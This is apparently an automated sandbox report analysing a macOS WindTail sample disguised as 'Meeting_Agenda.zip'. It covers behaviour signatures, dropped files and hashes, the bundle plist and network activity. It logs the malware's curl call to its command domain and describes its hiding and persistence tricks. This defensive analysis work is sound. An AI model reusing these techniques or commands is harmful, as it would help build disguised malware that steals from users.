Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report Meeting_Agenda.zip

Overview

General Information

Joe Sandbox Version:25.0.0
Analysis ID:66291
Start date:24.12.2018
Start time:09:33:49
Joe Sandbox Product:Cloud
Overall analysis duration:0h 6m 0s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Meeting_Agenda.zip
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal60.troj.evad.macZIP@0/11@5/0

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold600 - 100Report FP / FNfalsemalicious

Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsScripting1Hidden Files and Directories21Port MonitorsHidden Files and Directories21Credential DumpingSystem Information Discovery11Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol1
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesScripting1Network SniffingApplication Window DiscoveryRemote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote Access Tools1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionCode Signing2Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol11

Signature Overview

Click to jump to signature section


Networking:

barindex
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.55.204
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.55.204
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)Show sources
Source: unknownDNS traffic detected: query: flux2key.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: string2me.com replaycode: Server failure (2)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: flux2key.com

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.evad.macZIP@0/11@5/0

Persistence and Installation Behavior:

barindex
Writes Mach-O files to untypical directoriesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)64-bit Mach-O written to unusual path: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnodeJump to dropped file
Changes permissions of written Mach-O filesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Permissions modified for written 64-bit Mach-O /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode: bits: - usr: rx grp: rx all: rwxJump to dropped file
Creates hidden files, links and/or directoriesShow sources
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Hidden file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/.dat.nosync0219.V8cWwQJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Shell command executed: /bin/sh -c open -a /Users/henry/Library/Meeting_Agenda.appJump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Curl executable: /usr/bin/curl -> /usr/bin/curl string2me.com/qgHUDRZiYhOqQiN/kESklNvxsNZQcPl.phpJump to behavior
Opens applications that may be created onesShow sources
Source: /bin/sh (PID: 536)Application opened: open -a /Users/henry/Library/Meeting_Agenda.appJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 536)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)File written: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnodeJump to dropped file
Writes RTF files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/Credits.rtfJump to dropped file
Writes icon files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/WXBN.icnsJump to dropped file
App bundle is code signedShow sources
Source: Submitted file: Meeting_Agenda.zipCodeResources XML file: CodeResources
Source: Submitted file: Meeting_Agenda.zipCodeResources XML file: CodeResources
Submitted sample is a bundle that is signedShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)CodeSignature CodeResources file read: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)CodeSignature CodeResources file read: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/_CodeSignature/CodeResourcesJump to dropped file
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plistJump to dropped file
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Binary plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/MainMenu.nibJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to launch an application with a docker icon (i.e. hidden to the user)Show sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created with NSUIElement = 1: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plistJump to dropped file
Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers)Show sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created with CFBundleURLSchemes: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plistJump to dropped file

Language, Device and Operating System Detection:

barindex
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 536)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/open (PID: 536)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Remote Access Functionality:

barindex
Detected macOS WindTailShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)IOC file dropped: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnodeJump to dropped file


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 66291 Sample: Meeting_Agenda.zip Startdate: 24/12/2018 Architecture: MAC Score: 60 20 17.253.55.204, 49236, 80 APPLE-AUSTIN-AppleIncUS United States 2->20 22 string2me.com 2->22 24 flux2key.com 2->24 6 xpcproxy usrnode 2->6         started        10 xpcproxy usrnode 1 2->10         started        process3 file4 16 /Users/henry/Libra...tents/MacOS/usrnode, Mach-O 6->16 dropped 18 /Users/henry/Libra...Contents/Info.plist, XML 6->18 dropped 26 Detected macOS WindTail 6->26 28 Contains functionality to launch an application with a docker icon (i.e. hidden to the user) 6->28 30 Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers) 6->30 32 Writes Mach-O files to untypical directories 6->32 12 sh open 6->12         started        14 curl 10->14         started        signatures5 process6

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

cam-macmac-stand

Startup

  • system is mac1
  • xpcproxy (PID: 535 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • usrnode (PID: 535 PPID: 1 Overlayed Process Image: xpcproxy MD5: c211dff0d9ecff416a1bf5a588ec2d5d)
    • sh (PID: 536 PPID: 535 MD5: 8aa60b22a5d30418a002b340989384dc)
    • open (PID: 536 PPID: 535 Overlayed Process Image: sh MD5: 40ed6d8f35c9f20484b97582d296398f)
  • xpcproxy (PID: 537 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • usrnode (PID: 537 PPID: 1 Overlayed Process Image: xpcproxy MD5: c211dff0d9ecff416a1bf5a588ec2d5d)
    • curl (PID: 538 PPID: 537 MD5: 078cd73f58d3d8f875eed22522ff73f7)
  • cleanup

Created / dropped Files

/Users/henry/Library/Meeting_Agenda.app/Contents/Info.plist Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:XML document text
Size (bytes):1810
Entropy (8bit):5.130244541175711
Encrypted:false
MD5:34D8507FA6AF3F52C4261459135815EF
SHA1:49607CD7D1EF6BDB8387CC8522DEAFC8452D1564
SHA-256:1ED70921FE4C0DF16031054A9ED835053B3657084D15CE7E1DE68BDDCC88CEE5
SHA-512:485BEBDBF797F5A9191DF6856661C19240703741D2604A45E64ADE87C426ADE21BC63428D6F96AE3C879CDC3D0BAD3804308D741E84C4254A3809EC5C126342D
Malicious:true
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:Mach-O 64-bit executable
Size (bytes):109376
Entropy (8bit):5.787503965793262
Encrypted:false
MD5:C211DFF0D9ECFF416A1BF5A588EC2D5D
SHA1:1AA298A15E1A74B93F6C1B6F88A4CA9C245BF896
SHA-256:842F8D9ACC11438DEF811F07EBAD5BC675DFFFBCF491F5F04209D31CCD6D18E5
SHA-512:3B72D233A9B1296B14ACA376B069E18CE95B0BEEA3F593B577CFA846D77081848B73C65F8CA6B98AA7F066D2BFF1A4205E51A6C514B67F390D0F159E545EB9EA
Malicious:true
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/PkgInfo Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:ASCII text, with no line terminators
Size (bytes):8
Entropy (8bit):1.75
Encrypted:false
MD5:23B7D7D024ABB0F558420E098800BF27
SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:false
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/.dat.nosync0219.V8cWwQ Download File
Process:/Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:ASCII text, with no line terminators
Size (bytes):16
Entropy (8bit):3.0306390622295662
Encrypted:false
MD5:3A03271C6A1394968ED69B46BFDD3515
SHA1:6A199ED458DE7729B3A6F6B61A73A9CA69A6372A
SHA-256:6355AF909AA663850F9B722981630DEAF70F1C683A3F275FA1EC3E682EBBCE44
SHA-512:63B6DC7B78110228284735127BEE085DCDA8428374BB476FAF206AF86E8AA9AA37893FE722B8C0D355E166DDD8AF27468C87324C7BE72A467D72086F177D97E3
Malicious:false
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/WXBN.icns Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:data
Size (bytes):227766
Entropy (8bit):7.736381501953322
Encrypted:false
MD5:1CF99B2FA4C1BDF355824FC49025D3E5
SHA1:7A6806C824EAF06D15906A6585019209AA07468A
SHA-256:B743C0443BB9B3D4AE6E13609F2CECAFF0CAB9D9B89837B805B4D03122DA0D6E
SHA-512:5DB375621C9AA8B12B4CC6DA2D62F9AC1098A30887C9746B131E831EB4F61CA02371B38932501AB94965BF672E567BA8F7AEA0FC434A4408ABED8150DC1E38A9
Malicious:false
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/Credits.rtf Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:Rich Text Format data, unknown version
Size (bytes):436
Entropy (8bit):4.962904598670011
Encrypted:false
MD5:F0D4A61CAF597423FF07C5E9B24A345E
SHA1:60A248148B319DE26E36424D25021C2488E23CE8
SHA-256:B4386FE1CEF65CD91E6C8ECC065D117089083F91B7CADBF0C3E5EAE20E8B9640
SHA-512:E361011499CF70FC71E247FDDA71F49D913654A983AA4AE67D00DC977E53B9CF0D88D4D2AC07EFE248261C3AB6E3345E829E22DDA3E51DCCC221A94C660ACE69
Malicious:false
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/InfoPlist.strings Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:Little-endian UTF-16 Unicode C program text
Size (bytes):92
Entropy (8bit):3.2610300066712608
Encrypted:false
MD5:51EF59B60E5B41B91519CC662A9FE886
SHA1:3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256:39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512:3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious:false
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/MainMenu.nib Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:Apple binary property list
Size (bytes):1183
Entropy (8bit):6.409092690797022
Encrypted:false
MD5:01C8F3B137E4FF4EB3F1547AE7503B24
SHA1:137805C46825A28DC007229B9995B4FEFCA252D6
SHA-256:5DBF8A652E848D0D102A86E1F07BEF1937ED39F149ED123579EA45F36FBBF5D2
SHA-512:428121AD3308293F6E7621015FC913276166D3667F25E976D3609A657D5FE3769F64C054B2062760312C988FE29F7861C908EC7808BEF2DE5BC6942E2869B841
Malicious:false
Reputation:low
/Users/henry/Library/Meeting_Agenda.app/Contents/_CodeSignature/CodeResources Download File
Process:/Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:XML document text
Size (bytes):3214
Entropy (8bit):4.961458379982957
Encrypted:false
MD5:48845BD7B264E458CA47855981E44818
SHA1:C22AEF8AD246A7C05345556B8ED17E4DCBD90B72
SHA-256:A0A47E9C1A5A79AFC68324B11BA7462B88C966D9FD708550A24358DF87AF4DE9
SHA-512:4E844C5A65A525683E203F737670DD1545AB08C51C1BB92F32D155A48A996F51513BD5815534999AE73925B1E87BE6C27117787709E02D9E8DEA967792E96924
Malicious:false
Reputation:low
/dev/null Download File
Process:/Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
File Type:ASCII text
Size (bytes):63
Entropy (8bit):4.8322169792551914
Encrypted:false
MD5:B2C5D0885B31377CDC574C3E82B61B99
SHA1:F5085653F6B01F44FC1A8939AFC72AE7F454AFE9
SHA-256:6E06A818BE46110A80BAF3DBD0E893C9A01847E2BF3882B476D76387973A28BF
SHA-512:517F58CF309FB20BFE9CAB932AF52B66BC43BA0DD17EF9DFD9D892DC01ADB01E355CB88935420DE2EF53028305404EE166F00252FB8D71139CAA6616AD5BF845
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
string2me.comunknownunknownfalseunknown
flux2key.comunknownunknownfalseunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
17.253.55.204United States
6185APPLE-AUSTIN-AppleIncUSfalse

Static File Info

General

File type:Zip archive data, at least v1.0 to extract
Entropy (8bit):7.994905888951247
TrID:
  • Mac OS X Application Bundle (12004/1) 74.95%
  • ZIP compressed archive (4004/1) 25.00%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:Meeting_Agenda.zip
File size:252284
MD5:36284fdcd2c9cf53973adcae9d5144d1
SHA1:4613f5b1e172cb08d6a2e7f2186e2fdd875b24e5
SHA256:ad282e5ba2bc06a128eb20da753350278a2e47ab545fdab808e94a2ff7b4061e
SHA512:9f0fbca947e0fbe11455ec58cecdb4b5038f35c55de2cb777d4ed44ca7d60088ce85d77527ea5bf56a7785a00a82686219b7b79694a06fefd10be5670e2c90c3
SSDEEP:6144:KDY6w9qtblTi2V1UIQ70PtsTKGVwb+3G8DwiP:KDTttZVCIU0Pt+K4wb+W8DD
File Content Preview:PK..........7J................Meeting_Agenda.app/UX.....XX..X....PK........3.7J................Meeting_Agenda.app/Contents/UX.....X...X....PK........3.7J............+...Meeting_Agenda.app/Contents/_CodeSignature/UX.....X...X....PK........3.7J............8

Static App Info

General Informations

Package Info:
Property List File:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>BuildMachineOSBuild</key><string>14B25</string><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>usrnode</string><key>CFBundleIconFile</key><string>WXBN</string><key>CFBundleIdentifier</key><string>com.alis.tre</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundleName</key><string>usrnode</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleURLTypes</key><array><dict><key>CFBundleURLName</key><string>Local File</string><key>CFBundleURLSchemes</key><array><string>openurl2622007</string></array></dict></array><key>CFBundleVersion</key><string>1</string><key>DTCompiler</key><string>com.apple.compilers.llvm.clang.1_0</string><key>DTPlatformBuild</key><string>6D570</string><key>DTPlatformVersion</key><string>GM</string><key>DTSDKBuild</key><string>14D125</string><key>DTSDKName</key><string>macosx10.10</string><key>DTXcode</key><string>0630</string><key>DTXcodeBuild</key><string>6D570</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>NSAppTransportSecurity</key><dict><key>NSAllowsArbitraryLoads</key><true/></dict><key>NSHumanReadableCopyright</key><string>Copyright 2015 app. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>NSPrincipalClass</key><string>NSApplication</string><key>NSUIElement</key><string>1</string></dict></plist>

Resources

NameType
Info.plistXML document text
PkgInfoASCII text, with no line terminators
usrnodeMach-O 64-bit executable
WXBN.icnsdata
Credits.rtfRich Text Format data, unknown version
InfoPlist.stringsLittle-endian UTF-16 Unicode C program text
MainMenu.nibApple binary property list
CodeResourcesXML document text
Info.plistXML document text
PkgInfoASCII text, with no line terminators
usrnodeMach-O 64-bit executable
WXBN.icnsdata
Credits.rtfRich Text Format data, unknown version
InfoPlist.stringsLittle-endian UTF-16 Unicode C program text
MainMenu.nibApple binary property list
CodeResourcesXML document text

Static Mach Info

General Informations for header0

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:23
segment_command_64
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4294967296
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command_64
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize77824
nsects11
flags0
filesize77824
vmaddr4294967296
initprot5
Datassectname__text
segname__TEXT
reloff0
addr4294974600
align2
nreloc0
flags2147484672
offset7304
reserved20
reserved10
reserved30
size31843
sectname__stubs
segname__TEXT
reloff0
addr4295006444
align1
nreloc0
flags2147484680
offset39148
reserved26
reserved10
reserved30
size498
sectname__stub_helper
segname__TEXT
reloff0
addr4295006944
align2
nreloc0
flags2147484672
offset39648
reserved20
reserved10
reserved30
size846
sectname__objc_methname
segname__TEXT
reloff0
addr4295007790
align0
nreloc0
flags2
offset40494
reserved20
reserved10
reserved30
size5216
sectname__cstring
segname__TEXT
reloff0
addr4295013008
align4
nreloc0
flags2
offset45712
reserved20
reserved10
reserved30
size2383
sectname__ustring
segname__TEXT
reloff0
addr4295015392
align1
nreloc0
flags0
offset48096
reserved20
reserved10
reserved30
size142
sectname__objc_classname
segname__TEXT
reloff0
addr4295015534
align0
nreloc0
flags2
offset48238
reserved20
reserved10
reserved30
size172
sectname__objc_methtype
segname__TEXT
reloff0
addr4295015706
align0
nreloc0
flags2
offset48410
reserved20
reserved10
reserved30
size1369
sectname__const
segname__TEXT
reloff0
addr4295017088
align4
nreloc0
flags0
offset49792
reserved20
reserved10
reserved30
size20912
sectname__unwind_info
segname__TEXT
reloff0
addr4295038000
align2
nreloc0
flags0
offset70704
reserved20
reserved10
reserved30
size480
sectname__eh_frame
segname__TEXT
reloff0
addr4295038480
align3
nreloc0
flags0
offset71184
reserved20
reserved10
reserved30
size6632
segment_command_64
NameValue
segname__DATA
fileoff77824
maxprot7
vmsize16384
nsects20
flags0
filesize12288
vmaddr4295045120
initprot3
Datassectname__program_vars
segname__DATA
reloff0
addr4295045120
align3
nreloc0
flags0
offset77824
reserved20
reserved10
reserved30
size40
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr4295045160
align3
nreloc0
flags6
offset77864
reserved20
reserved183
reserved30
size16
sectname__got
segname__DATA
reloff0
addr4295045176
align3
nreloc0
flags6
offset77880
reserved20
reserved185
reserved30
size80
sectname__la_symbol_ptr
segname__DATA
reloff0
addr4295045256
align3
nreloc0
flags7
offset77960
reserved20
reserved195
reserved30
size664
sectname__cfstring
segname__DATA
reloff0
addr4295045920
align3
nreloc0
flags0
offset78624
reserved20
reserved10
reserved30
size2080
sectname__objc_classlist
segname__DATA
reloff0
addr4295048000
align3
nreloc0
flags268435456
offset80704
reserved20
reserved10
reserved30
size40
sectname__objc_nlclslist
segname__DATA
reloff0
addr4295048040
align3
nreloc0
flags268435456
offset80744
reserved20
reserved10
reserved30
size8
sectname__objc_catlist
segname__DATA
reloff0
addr4295048048
align3
nreloc0
flags268435456
offset80752
reserved20
reserved10
reserved30
size40
sectname__objc_protolist
segname__DATA
reloff0
addr4295048088
align3
nreloc0
flags0
offset80792
reserved20
reserved10
reserved30
size40
sectname__objc_imageinfo
segname__DATA
reloff0
addr4295048128
align2
nreloc0
flags0
offset80832
reserved20
reserved10
reserved30
size8
sectname__objc_const
segname__DATA
reloff0
addr4295048136
align3
nreloc0
flags0
offset80840
reserved20
reserved10
reserved30
size6056
sectname__objc_selrefs
segname__DATA
reloff0
addr4295054192
align3
nreloc0
flags268435461
offset86896
reserved20
reserved10
reserved30
size1480
sectname__objc_protorefs
segname__DATA
reloff0
addr4295055672
align3
nreloc0
flags0
offset88376
reserved20
reserved10
reserved30
size16
sectname__objc_classrefs
segname__DATA
reloff0
addr4295055688
align3
nreloc0
flags268435456
offset88392
reserved20
reserved10
reserved30
size248
sectname__objc_superrefs
segname__DATA
reloff0
addr4295055936
align3
nreloc0
flags268435456
offset88640
reserved20
reserved10
reserved30
size24
sectname__objc_ivar
segname__DATA
reloff0
addr4295055960
align3
nreloc0
flags0
offset88664
reserved20
reserved10
reserved30
size248
sectname__objc_data
segname__DATA
reloff0
addr4295056208
align3
nreloc0
flags0
offset88912
reserved20
reserved10
reserved30
size480
sectname__data
segname__DATA
reloff0
addr4295056688
align3
nreloc0
flags0
offset89392
reserved20
reserved10
reserved30
size464
sectname__common
segname__DATA
reloff0
addr4295057152
align3
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size40
sectname__bss
segname__DATA
reloff0
addr4295057200
align4
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size1025
segment_command_64
NameValue
segname__LINKEDIT
fileoff90112
maxprot7
vmsize20480
nsects0
flags0
filesize19264
vmaddr4295061504
initprot1
dyld_info_command
NameValue
lazy_bind_size1808
lazy_bind_off91944
weak_bind_size16
rebase_size368
export_off93752
export_size192
bind_off90480
rebase_off90112
bind_size1448
weak_bind_off91928
symtab_command
NameValue
strsize2344
symoff94160
stroff96904
nsyms127
dysymtab_command
NameValue
extreloff0
nlocrel0
indirectsymoff96192
modtaboff0
nextrel0
iundefsym2
nmodtab0
ilocalsym0
nundefsym125
nextrefsyms0
locreloff0
ntoc0
nlocalsym1
tocoff0
extrefsymoff0
nindirectsyms178
iextdefsym1
nextdefsym1
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuid0c515d6269c53afe9f017105626230fe
version_min_command
NameValue
version657152
reserved657920
dylib_command
NameValue
compatibility_version2312.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version2312.0.0
Data/usr/lib/libcrypto.0.9.8.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.21.0
Data/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
dylib_command
NameValue
compatibility_version0.44.1
timestampThu Jan 01 01:00:02 1970
name24
current_version5120.129.4
Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.228.0
Data/usr/lib/libobjc.A.dylib
dylib_command
NameValue
compatibility_version0.7.0
timestampThu Jan 01 01:00:02 1970
name24
current_version256.104.0
Data/usr/lib/libstdc++.6.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.189.4
Data/usr/lib/libSystem.B.dylib
dylib_command
NameValue
compatibility_version0.45.0
timestampThu Jan 01 01:00:02 1970
name24
current_version14592.67.5
Data/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
dylib_command
NameValue
compatibility_version0.150.0
timestampThu Jan 01 01:00:02 1970
name24
current_version4608.129.4
Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.62.0
Data/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
linkedit_data_command
NameValue
dataoff93944
datassize216
linkedit_data_command
NameValue
dataoff94160
datassize0
linkedit_data_command
NameValue
dataoff99248
datassize10128

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Dez 24, 2018 09:34:58.404784918 MEZ5698153192.168.0.508.8.8.8
Dez 24, 2018 09:34:58.409457922 MEZ53569818.8.8.8192.168.0.50
